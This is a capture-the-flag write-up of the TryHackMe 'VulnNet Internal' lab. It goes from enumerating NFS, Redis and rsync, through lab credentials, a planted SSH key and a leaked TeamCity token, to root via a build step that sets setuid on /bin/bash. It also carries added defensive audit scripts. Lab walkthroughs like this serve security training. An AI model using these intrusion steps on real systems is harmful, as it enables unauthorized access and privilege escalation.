VulnNet Internal TryHackMe

laluwan_w
Jan 9, 2023

Hello. This time I will try to solve a TryHackMe box. As usual, I will approach this box the way I would a black-box attack in the real world. First, I start by scanning the machine with nmap.

wooxx@wanzroot:~/Documents/VulnNet-internal$ cat nmap.txt                
# Nmap 7.93 scan initiated Sun Jan 8 03:18:46 2023 as: nmap -sC -sV -oN nmap.txt 10.10.216.235
Nmap scan report for 10.10.216.235
Host is up (0.29s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e278f48ae2ff889bb8913e39afd6340 (RSA)
| 256 f4fe0be25c88b563138550ddd586abbd (ECDSA)
|_ 256 82ea4885f02a237e0ea9d9140a602fad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42801/tcp6 mountd
| 100005 1,2,3 45197/udp mountd
| 100005 1,2,3 51815/tcp mountd
| 100005 1,2,3 51897/udp6 mountd
| 100021 1,3,4 40543/tcp nlockmgr
| 100021 1,3,4 45643/tcp6 nlockmgr
| 100021 1,3,4 53552/udp6 nlockmgr
| 100021 1,3,4 57291/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m37s, median: -1s
| smb2-time:
| date: 2023-01-08T08:27:37
|_ start_date: N/A
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2023-01-08T09:27:37+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 8 03:27:46 2023 -- 1 IP address (1 host up) scanned in 539.44 seconds

Here I test the NFS service and start checking it.

wooxx@wanzroot:~/Documents/VulnNet-internal$ showmount -e 10.10.146.152  
Export list for 10.10.146.152:
/opt/conf *

The /opt/conf folder is shared, and we can mount it and go in to look at its contents.

wooxx@wanzroot:~/Documents/VulnNet-internal$ mkdir /tmp/vulnet                                   

wooxx@wanzroot:~/Documents/VulnNet-internal$ sudo mount -t nfs 10.10.146.152:/opt/conf /tmp/vulnet
[sudo] password for wooxx:

wooxx@wanzroot:~/Documents/VulnNet-internal$ ls /tmp/vulnet
hp init opt profile.d redis vim wildmidi
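
A server-side check for the export seen above, as an added example that is not part of the original write-up: it reads `/etc/exports`-style text and flags client specs that match every host, including the case where a space before `(options)` turns the options into a world export. The sample entries are constructed; the target's real export options are not shown on the page.

```sh
# Added example: flag risky client specs in /etc/exports-style text (stdin).
# Prints "path client finding" for wildcard clients and for no_root_squash.
audit_exports() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }      # skip comments and blank lines
    {
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1, length($i) - p - 1)
            }
            if (client == "") client = "*"  # "(opts)" with no host applies to any host
            if (client == "*") print $1, client, "world-export"
            if (client == "*" && ("," opts ",") ~ /,rw,/) print $1, client, "world-writable"
            if (("," opts ",") ~ /,no_root_squash,/) print $1, client, "no_root_squash"
        }
    }'
}

sample_exports() {   # constructed sample, not the target's file
    cat <<'EOF'
# constructed sample
/opt/conf   *(rw,sync,no_subtree_check)
/srv/build  10.0.5.0/24(ro,sync) backup01(rw,no_root_squash)
/srv/home   10.0.5.12 (rw,sync)
/srv/pub    192.168.1.10(ro,root_squash)
EOF
}
sample_exports | audit_exports
```

On a real server the same function is run as `audit_exports < /etc/exports`.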

Exploring several folders and files, I found the Redis password in redis/redis.conf.

wooxx@wanzroot:/tmp/vulnet/redis$ cat redis.conf | grep "pass"
# 2) No password is configured.
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
requirepass "B65Hx562F@ggAZ@F"
# resync is enough, just passing the portion of data the slave missed while
# 150k passwords per second against a good box. This means that you should
# requirepass foobared

I log in to the Redis database with the credential and find credential text encoded in base64.

wooxx@wanzroot:~/Documents/VulnNet-internal$ redis-cli -h 10.10.146.152 -a 'B65Hx562F@ggAZ@F'
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.146.152:6379> KEYS *
1) "marketlist"
2) "internal flag"
3) "tmp"
4) "int"
5) "authlist"
10.10.146.152:6379> type "internal flag"
string
10.10.146.152:6379> type "authlist"
list
10.10.146.152:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.146.152:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
10.10.146.152:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.146.152:6379>

from base64

rsync is a utility for efficiently transferring and synchronizing files between a computer and a storage drive, and across networked computers, by comparing the modification times and sizes of files. Let's use the credentials we found to log in. First I check which folders are shared.

wooxx@wanzroot:~/Documents/VulnNet-internal$ rsync 10.10.146.152::
files Necessary home interaction

I log in and pull all the files in the files folder above.
The interesting thing I found is the .ssh folder. Here we can upload an RSA public key.

wooxx@wanzroot:~/Documents/VulnNet-internal$ rsync -av rsync://rsync-connect@10.10.146.152/files files_target       
Password:
receiving incremental file list
created directory files_target
./
sys-internal/
sys-internal/.Xauthority
sys-internal/.bash_history -> /dev/null
sys-internal/.bash_logout
sys-internal/.bashrc
sys-internal/.dmrc
sys-internal/.profile
sys-internal/.ssh/
sys-internal/.thumbnails/
sys-internal/.thumbnails/large/
sys-internal/.thumbnails/normal/
sys-internal/.thumbnails/normal/2b53c68a980e4c943d2853db2510acf6.png
sys-internal/.thumbnails/normal/473aeca0657907b953403884c53d865c.png
sys-internal/.thumbnails/normal/539380d1cb60fcd744fd5094d314fdc1.png
sys-internal/Desktop/
sys-internal/Documents/
sys-internal/Downloads/
sys-internal/Music/
sys-internal/Pictures/
sys-internal/Public/
sys-internal/Templates/
sys-internal/Videos/

wooxx@wanzroot:~/Documents/VulnNet-internal/files_target/sys-internal$ ls -la
total 108
drwxr-xr-x 18 wooxx wooxx 4096 Feb 6 2021 .
drwxr-xr-x 3 wooxx wooxx 4096 Feb 1 2021 ..
lrwxrwxrwx 1 wooxx wooxx 9 Feb 1 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wooxx wooxx 220 Feb 1 2021 .bash_logout
-rw-r--r-- 1 wooxx wooxx 3771 Feb 1 2021 .bashrc
drwxrwxr-x 8 wooxx wooxx 4096 Feb 2 2021 .cache
drwxrwxr-x 14 wooxx wooxx 4096 Feb 1 2021 .config
drwx------ 3 wooxx wooxx 4096 Feb 1 2021 .dbus
drwx------ 2 wooxx wooxx 4096 Feb 1 2021 Desktop
-rw-r--r-- 1 wooxx wooxx 26 Feb 1 2021 .dmrc
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Documents
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Downloads
drwx------ 3 wooxx wooxx 4096 Feb 1 2021 .gnupg
drwxrwxr-x 3 wooxx wooxx 4096 Feb 1 2021 .local
drwx------ 5 wooxx wooxx 4096 Feb 1 2021 .mozilla
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Music
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Pictures
-rw-r--r-- 1 wooxx wooxx 807 Feb 1 2021 .profile
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Public
lrwxrwxrwx 1 wooxx wooxx 9 Feb 2 2021 .rediscli_history -> /dev/null
drwxrwxr-x 2 wooxx wooxx 4096 Feb 6 2021 .ssh
-rw-r--r-- 1 wooxx wooxx 0 Feb 1 2021 .sudo_as_admin_successful
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Templates
drwx------ 4 wooxx wooxx 4096 Feb 2 2021 .thumbnails
-rw------- 1 wooxx wooxx 38 Feb 6 2021 user.txt
drwxr-xr-x 2 wooxx wooxx 4096 Feb 1 2021 Videos
-rw------- 1 wooxx wooxx 61 Feb 6 2021 .Xauthority
-rw-r--r-- 1 wooxx wooxx 14 Feb 12 2018 .xscreensaver
-rw------- 1 wooxx wooxx 2546 Feb 6 2021 .xsession-errors
-rw------- 1 wooxx wooxx 2546 Feb 6 2021 .xsession-errors.old

wooxx@wanzroot:~/Documents/VulnNet-internal/files_target/sys-internal$

I upload the RSA public key file and get initial access.

wooxx@wanzroot:~/Documents/VulnNet-internal$ rsync -av /home/wooxx/.ssh/id_rsa.pub rsync://rsync-connect@10.10.146.152/files/sys-internal/.ssh/authorized_keys 
Password:
sending incremental file list
id_rsa.pub

sent 677 bytes received 35 bytes 40.69 bytes/sec
total size is 568 speedup is 0.80

wooxx@wanzroot:~/Documents/VulnNet-internal$ ssh sys-internal@10.10.146.152 -i /home/wooxx/.ssh/id_rsa
The authenticity of host '10.10.146.152 (10.10.146.152)' can't be established.
ED25519 key fingerprint is SHA256:Hft/gU7OujMpBswfda4Gl0bN4EdP78+T0Iszs/Eq52c.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:43: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.146.152' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64

sys-internal@vulnnet-internal:~$
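
The write into `.ssh/authorized_keys` above works because the rsync module is writable and covers a home directory. The following added example (not part of the original write-up) audits `rsyncd.conf`-style text for writable modules; the sample configuration is constructed, and the module path `/home` is an assumption since the page does not show the target's `rsyncd.conf`.

```sh
# Added example: list writable modules found in rsyncd.conf-style text on stdin.
# Output: module, path, host restriction, and whether the path covers home dirs.
audit_rsyncd() {
    awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    function report() {
        if (mod == "" || !writable) return
        gsub(/[ \t]+/, ",", allow)
        home = ((path "/") ~ /^\/(home|root)\//) ? "covers-home" : "-"
        print mod, path, "hosts-allow=" (allow == "" ? "any" : allow), home
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    /^[ \t]*\[/ {                       # new [module] section
        report()
        mod = $0; sub(/^[ \t]*\[/, "", mod); sub(/\].*$/, "", mod)
        path = ""; allow = gallow; writable = gwritable
        next
    }
    {
        eq = index($0, "="); if (eq == 0) next
        key = tolower(trim(substr($0, 1, eq - 1)))
        val = trim(substr($0, eq + 1))
        if (key == "read only") {       # rsync default is read only = yes
            w = (tolower(val) ~ /^(no|false|0)$/)
            if (mod == "") gwritable = w; else writable = w
        } else if (key == "hosts allow") {
            if (mod == "") gallow = val; else allow = val
        } else if (key == "path") path = val
    }
    END { report() }'
}

sample_rsyncd_conf() {   # constructed sample; the page does not show rsyncd.conf
    cat <<'EOF'
read only = yes
[files]
    comment = Necessary home interaction
    path = /home
    read only = no
    auth users = rsync-connect
[mirror]
    path = /srv/mirror
[drop]
    path = /srv/drop
    read only = false
    hosts allow = 10.0.5.0/24 10.0.6.7
EOF
}
sample_rsyncd_conf | audit_rsyncd
```

A module reported with `covers-home` and `hosts-allow=any` is the combination to fix first: set `read only = yes` or move the module path away from home directories.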

After spending quite a lot of time exploring directories, I found a TeamCity folder in the root directory.

sys-internal@vulnnet-internal:~$ ls /
bin dev home initrd.img.old lib64 media opt root sbin swapfile TeamCity usr vmlinuz
boot etc initrd.img lib lost+found mnt proc run srv sys tmp var vmlinuz.old
sys-internal@vulnnet-internal:~$

It appears to be running on localhost. I will set up a port forward using SSH. Before that, I check which ports are listening.

sys-internal@vulnnet-internal:~$ ss -ltp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 5 0.0.0.0:rsync 0.0.0.0:*
LISTEN 0 50 0.0.0.0:netbios-ssn 0.0.0.0:*
LISTEN 0 128 0.0.0.0:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:sunrpc 0.0.0.0:*
LISTEN 0 128 0.0.0.0:60019 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 5 127.0.0.1:ipp 0.0.0.0:*
LISTEN 0 50 0.0.0.0:microsoft-ds 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33887 0.0.0.0:*
LISTEN 0 64 0.0.0.0:nfs 0.0.0.0:*
LISTEN 0 64 0.0.0.0:40229 0.0.0.0:*
LISTEN 0 128 0.0.0.0:45765 0.0.0.0:*
LISTEN 0 1 [::ffff:127.0.0.1]:8105 *:*
LISTEN 0 5 [::]:rsync [::]:*
LISTEN 0 50 *:44395 *:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 50 [::]:netbios-ssn [::]:*
LISTEN 0 100 [::ffff:127.0.0.1]:8111 *:*
LISTEN 0 128 [::]:40719 [::]:*
LISTEN 0 128 [::]:46415 [::]:*
LISTEN 0 128 [::]:sunrpc [::]:*
LISTEN 0 128 [::]:ssh [::]:*
LISTEN 0 5 [::1]:ipp [::]:*
LISTEN 0 64 [::]:35899 [::]:*
LISTEN 0 128 [::]:43355 [::]:*
LISTEN 0 50 [::]:microsoft-ds [::]:*
LISTEN 0 50 [::ffff:127.0.0.1]:56255 *:*
LISTEN 0 64 [::]:nfs [::]:*
LISTEN 0 50 *:9090 *:*

After trying all the local ports, the real one is 8111. I open the port with an SSH port forward.

wooxx@wanzroot:~/Documents/VulnNet-internal$ ssh -L 8000:127.0.0.1:8111 sys-internal@10.10.251.128 -i /home/wooxx/.ssh/id_rsa

Trying several default passwords failed. Check the super user login.

Hmm, it seems we need a token. Let's look for the token in the TeamCity logs folder.

sys-internal@vulnnet-internal:/TeamCity/logs$ cat * | grep token 2>/dev/null
cat: catalina.2021-02-06.log: Permission denied
cat: catalina.2021-02-07.log: Permission denied
cat: catalina.2023-01-09.log: Permission denied
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
cat: [TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3796375970133326145 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3796375970133326145 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3796375970133326145 (use empty username with the token as the password to access the server)

I try one of the tokens and it is valid.
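
From the defender's side, the exposure here is a log file that a low-privileged account can read and that holds a working super user token. The following added example (not from the original write-up) lists such files under a logs directory without echoing the token values; the file names other than `catalina.2021-02-06.log`, the token value and the temporary directory are constructed.

```sh
# Added example: report log files that group or other can read and that
# contain a TeamCity super user token line. Prints "mode count filename".
token_log_exposure() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) 2>/dev/null | sort |
    while IFS= read -r f; do
        # grep -c exits non-zero when the count is 0, so such files are skipped
        n=$(grep -c 'Super user authentication token: [0-9]' "$f" 2>/dev/null) || continue
        mode=$(ls -ld "$f" | cut -c1-10)
        echo "$mode $n ${f##*/}"
    done
}

demo_token_logs() {
    d=$(mktemp -d)
    # Constructed log line; the token value is a placeholder.
    line='[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)'
    printf '%s\n%s\n' "$line" "$line" > "$d/teamcity-server.log"
    printf '%s\n' "$line" > "$d/catalina.2021-02-06.log"
    printf 'no token here\n' > "$d/teamcity-vcs.log"
    chmod 644 "$d/teamcity-server.log" "$d/teamcity-vcs.log"
    chmod 600 "$d/catalina.2021-02-06.log"   # owner-only, like the denied files above
    token_log_exposure "$d"
    rm -rf "$d"
}
demo_token_logs
```

Any file this reports should be restricted to the service account that owns the TeamCity process.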

After figuring out how to get root access, it turns out we can run a command line from the web interface. Because the web application is run by the root user, the commands are automatically executed as root.

Create a project, then under build steps choose Command Line, and in the command script field we give bash the superuser permission. Save and run.

Once it finishes, check the /bin/bash file and get the flag.

sys-internal@vulnnet-internal:/TeamCity/logs$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1113504 Apr 4 2018 /bin/bash
sys-internal@vulnnet-internal:/TeamCity/logs$ /bin/bash -p
bash-4.4# id
uid=1000(sys-internal) gid=1000(sys-internal) euid=0(root) egid=0(root) groups=0(root),24(cdrom),1000(sys-internal)
bash-4.4#
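
A setuid bit on a shell, as in the `-rwsr-sr-x` listing above, is caught by comparing setuid/setgid files against a known-good baseline. Added example, not from the original write-up: the baseline file format (one absolute path per line), the directory layout and the file names in the demo are constructed.

```sh
# Added example: print setuid/setgid regular files under the given directories
# that are not listed in the baseline file (one absolute path per line).
# Shells and script interpreters are marked CRITICAL, everything else REVIEW.
unexpected_suid() {
    baseline=$1; shift
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
    while IFS= read -r f; do
        grep -qxF -- "$f" "$baseline" && continue   # expected, skip
        case ${f##*/} in
            sh|bash|dash|zsh|ksh|python*|perl*|ruby*) echo "CRITICAL $f" ;;
            *) echo "REVIEW $f" ;;
        esac
    done
}

demo_suid() {
    # Constructed directory tree standing in for /bin.
    d=$(mktemp -d); mkdir "$d/bin"
    for n in bash passwd backup-tool ls; do : > "$d/bin/$n"; done
    chmod 4755 "$d/bin/bash" "$d/bin/passwd" "$d/bin/backup-tool"
    chmod 755 "$d/bin/ls"
    printf '%s\n' "$d/bin/passwd" > "$d/baseline"   # passwd is expected to be setuid
    unexpected_suid "$d/baseline" "$d/bin"
    rm -rf "$d"
}
demo_suid
```

On a real host the call is `unexpected_suid /path/to/baseline /bin /usr/bin /usr/local/bin`, with the baseline captured from a clean install.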
